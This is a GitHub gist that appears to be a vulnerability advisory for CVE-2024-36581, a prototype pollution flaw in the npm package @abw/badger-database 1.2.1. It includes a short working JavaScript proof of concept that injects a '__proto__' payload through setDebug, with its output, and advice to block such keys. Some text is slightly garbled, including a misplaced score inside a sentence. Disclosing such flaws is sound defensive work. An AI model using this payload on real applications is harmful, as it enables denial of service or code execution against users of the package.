Skip to content

Instantly share code, notes, and snippets.

@mestrtee

mestrtee/CVE-2024-36581.md

Last active July 29, 2024 19:17
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save mestrtee/f6b2ed1b3b4bc0df994c7455fc6110bd to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save mestrtee/f6b2ed1b3b4bc0df994c7455fc6110bd to your computer and use it in GitHub Desktop.
Download ZIP
[CVE-2024-36581] Prototype Pollution vulnerability affecting @abw/badger-database, version 1.2.1
Raw
CVE-2024-36581.md

SVSS Score
7.6 HIGH

Overview

Affected versions of this package are vulnerable to Prototype Pollution. An attacker can manipulate the prototype of an object, potentially leading t7.6 HIGHo the alteration of behavior of all objects inheriting from the affected prototype by modify built-in Object.prototype through reachable special properties __proto__ and constructor.prototype. Thus, the attacker can use one of these properties to pollute the application logic that can be escalated to Denial of service, remote code execution or cross-site scripting attacks.

Location:

@abw/badger-database/dist/badger-database.esm.js:1

PoC:

(async () => {
  const lib = await import('@abw/badger-database');

var BAD_JSON = JSON.parse('{"__proto__":{"polluted":true}}');
var victim = {}
console.log("Before Attack: ", JSON.stringify(victim.__proto__));
try {
  lib.setDebug (BAD_JSON)
} catch (e) { }
console.log("After Attack: ", JSON.stringify(victim.__proto__));
delete Object.prototype.polluted;
})();

Output:

Before Attack: {}
After Attack: {"polluted":true}

How to prevent:

No updates were provided by the maintainer.

References:

No updates were provided by the maintainer. Users of this module are urged to implement proper santization and validation over user's supplied inputs, such as blocking inputs containing __proto__ and contructor.prototype

References:

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment